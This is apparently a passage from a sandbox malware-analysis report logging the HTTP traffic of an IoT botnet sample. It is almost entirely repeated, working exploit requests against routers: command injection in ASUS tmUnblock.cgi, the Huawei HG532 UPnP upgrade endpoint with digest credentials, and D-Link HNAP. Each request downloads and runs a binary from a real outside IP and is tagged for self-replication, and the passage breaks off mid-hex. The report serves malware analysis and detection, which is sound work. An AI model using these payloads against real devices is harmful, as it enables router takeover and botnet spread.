Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 